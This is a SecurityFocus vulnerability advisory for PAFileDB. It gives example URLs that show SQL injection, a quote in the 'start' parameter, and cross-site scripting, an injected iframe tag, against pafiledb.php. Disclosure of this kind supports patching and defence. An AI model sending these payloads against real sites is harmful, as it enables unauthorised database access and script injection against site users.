Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PAFileDB Multiple SQL Injection And Cross-Site Scripting Vulnerabilities

The following examples were provided to demonstrate SQL injection:

http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating

The following examples were provided to demonstrate cross-site scripting:

http://www.example.com/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%20src=http://www.securityreason.com></iframe
>&sortby=rating
http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></ifram
e>&sortby=date







 

Privacy Statement
Copyright 2008, SecurityFocus